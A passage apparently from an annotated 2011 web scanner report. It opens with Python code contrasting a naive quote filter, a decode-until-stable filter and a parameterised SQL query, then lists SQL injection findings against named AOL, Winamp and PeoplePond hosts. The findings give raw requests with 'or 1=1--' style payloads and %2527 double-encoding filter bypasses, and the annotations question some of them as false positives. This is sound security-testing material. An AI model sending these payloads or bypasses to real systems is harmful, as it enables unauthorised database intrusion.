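    decoded = server_decode(raw)
    if naive_block(decoded):
        return None
    return application_decode(decoded)


# --- hardened filter: canonicalise first, then inspect ---------------------

def canonicalize(raw, max_rounds=3):
    """Decode until the value stops changing, so the filter sees exactly what
    a double-decoding sink would see; reject embedded NULs outright."""
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if "\x00" in value:
        raise ValueError("NUL byte in parameter")
    return value


def hardened_block(raw):
    """Blocking decision taken on the canonical value; a NUL is a block."""
    try:
        return "'" in canonicalize(raw)
    except ValueError:
        return True


# --- the sink: why the bypass matters, and what actually fixes it ----------

def make_posts_db():
    """Constructed in-memory table standing in for the blog's posts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (year TEXT, slug TEXT)")
    conn.execute("INSERT INTO posts VALUES ('2011', 'bad-behavior-2-1-8')")
    return conn


def slugs_unsafe(conn, year):
    """String concatenation: a quote that reaches here changes the statement
    and SQLite raises OperationalError (the 'database error message')."""
    sql = "SELECT slug FROM posts WHERE year = '" + year + "'"
    return [row[0] for row in conn.execute(sql)]


def slugs_safe(conn, year):
    """Bound parameter: the quote is data, the query simply matches nothing."""
    sql = "SELECT slug FROM posts WHERE year = ?"
    return [row[0] for row in conn.execute(sql, (year,))]
```

value_reaching_sink("2011%27") is blocked, but "2011%2527" reaches the sink as 2011' and "1920%00'" reaches it with the quote intact behind the NUL; hardened_block rejects all three. Decode-until-stable is only a mitigation for the blocking layer: slugs_unsafe raises on 2011' however it arrived, while slugs_safe returns an empty list for the same input, which is the fix the scanner's "attempts to block" wording should prompt.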
The file parameter appears to be vulnerable to SQL injection attacks. The payloads 80562684'%20or%201%3d1--%20 and 80562684'%20or%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Look at what the difference actually is before accepting this. Response 1 is a Tomcat HTTP 400 error report from the os_merge servlet ("Skipping file. File is not a text file. Only text files can be merged."), an input-validation error about the file name, not a database error. Response 2 is a text/plain body with a Last-Modified of 26 Jan 2011 and a 30-day max-age, consistent with a previously merged file being served rather than with the second payload evaluating differently. The evidence for a SQL query behind this parameter is thin. The error page does reflect the raw file parameter, including the unencoded quote, into a text/html body, and that reflection merits a check of its own.
Request 1
GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1835
Cache-Control: public, max-age=30
Expires: Sun, 27 Feb 2011 17:46:13 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding
<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Skipping file. File is not a text file. Only text files can be merged. : file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Skipping file. File is not a text file. Only text files can be merged. : file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect (Skipping file. File is not a text file. Only text files can be merged. : file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooks ...[SNIP]...
Request 2
GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d2--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Tue, 29 Mar 2011 17:45:43 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15821
The MintUnique cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the MintUnique cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
This is the same Mint tracker script seen in the User-Agent finding above, where the key= value in the response body differed between the two responses shown and drove the Content-Length difference. Mask that token (and compare the bodies of two unmodified requests) before reading anything into a difference here.
Request 1
GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d1--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200
Response 1
HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:04 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5171
Connection: close
Content-Type: text/javascript
var Mint = new Object();
Mint.save = function() {
    var now = new Date();
    var debug = false; // this is set by php
    if (window.location.hash == '#Mint:Debug') { debug = true; };
    var path = 'http://peoplepond.com/_mint/?record&key=343430744850704d4435326e6e73383850754b394350495a4d61673231';
    path = path.replace(/^https?:/, window.location.protocol);

    // Loop through the different plug-ins to assemble the query string
    for (var developer in this) {
        for (var plugin in this[developer]) {
            if (this[developer][plugin] && this[developer][plugin].onsave) {
                path += this[developer][plugin].onsave();
            };
        };
    };
    // Slap the current time on there to prevent caching on subsequent page views in a few browsers
    path += '&'+now.getTime();

    // Redirect to the debug page
    if (debug) {
        window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime());
        return;
    };

    var ie = /*@cc_on!@*/0;
    if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement)) {
        var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
        tag.type = 'text/javascript';
        tag.src = path + '&serve_js';
        document.getElementsByTagName('head')[0].appendChild(tag);
    } else if (document.write) {
        document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>');
    };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer = {
    onsave : function() {
        var encoded = 0;
        if (typeof Mint_SI_DocumentTitle == 'undefined') {
            Mint_SI_DocumentTitle = document.title;
        } else {
            encoded = 1;
        };
        var referer = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
        var resource = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
        return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
    }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 = {
    versionHigh : 16,
    flashVersion : 0,
    resolution : '0x0',
    detectFlashVersion : function () {
        var ua = navigator.userAgent.toLowerCase();
        if (navigator.plug ...[SNIP]...
Request 2
GET /_mint/?js HTTP/1.1 Host: peoplepond.com Proxy-Connection: keep-alive Referer: http://peoplepond.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d2--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:08 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC" Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com Content-Length: 5161 Connection: close Content-Type: text/javascript
var Mint = new Object(); Mint.save = function() { var now = new Date(); var debug = false; // this is set by php if (window.location.hash == '#Mint:Debug') { debug = true; }; var path = 'http://peoplepond.com/_mint/?record&key=383430353263524c3861594c76386f69676f565539326b31'; path = path.replace(/^https?:/, window.location.protocol);
// Loop through the different plug-ins to assemble the query string for (var developer in this) { for (var plugin in this[developer]) { if (this[developer][plugin] && this[developer][plugin].onsave) { path += this[developer][plugin].onsave(); }; }; }; // Slap the current time on there to prevent caching on subsequent page views in a few browsers path += '&'+now.getTime();
// Redirect to the debug page if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
var ie = /*@cc_on!@*/0; if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement)) { var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script'); tag.type = 'text/javascript'; tag.src = path + '&serve_js'; document.getElementsByTagName('head')[0].appendChild(tag); } else if (document.write) { document.write('<' + 'script type="text/javascript" src="' + path + '&serve_js"><' + '/script>'); }; }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.Referrer = { onsave : function() { var encoded = 0; if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; } else { encoded = 1; }; var referer = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer; var resource = (window.decodeURI)?window.decodeURI(document.URL):document.URL; return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded; } }; if (!Mint.SI) { Mint.SI = new Object(); } Mint.SI.UserAgent007 = { versionHigh : 16, flashVersion : 0, resolution : '0x0', detectFlashVersion : function () { var ua = navigator.userAgent.toLowerCase(); if (navigator.plugins && nav ...[SNIP]...
The BIGipServerp-drh-dc1pod5-pool1-active cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the BIGipServerp-drh-dc1pod5-pool1-active cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409894031,0) Date: Sun, 27 Feb 2011 17:47:24 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409894267,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:25 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF'; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=127409868347,0) Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 24204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>javax.servlet.ServletException: Required Page Parameter: productID not provided at com.digitalriver.system.controller.SiteflowPlugin.appendURLParamsAndSection(SiteflowPlugin.java:283) at com.digitalriver.system.controller.Siteflo ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF''; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=127409869490,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:00 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The Locale parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Locale parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101639964458,0) Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 23783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head> <!--!esi:include src="/esi?Sit ...[SNIP]... -!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=abd830b5&Env=BASE&Locale=en_US&SiteID=winamp&StyleID=1911700&StyleVersion=17&ThemeID=1279300&ceid=168730900&cename=TopHeader&id=ServerErrorPage&productID=103591500"--> ...[SNIP]... <pre>com.digitalriver.exception.TrackedSystemException: SIT_000001 at com.digitalriver.system.controller.SiteflowPlugin.determineNextPage(SiteflowPlugin.java:389) at com.digitalriver.system.controller.SiteflowPlugin.handleRequest( ...[SNIP]...
Request 2
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US%2527%2527&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response 2
HTTP/1.1 302 Moved Temporarily Location: https://shop.winamp.com/store?Action=DisplayProductInterstitialDetailsPage&Env=BASE&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 Content-Type: text/plain Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=101639965117,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:45:22 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1 Host: shop.winamp.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131704891155,0) Date: Sun, 27 Feb 2011 17:47:54 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59 Content-Length: 32916
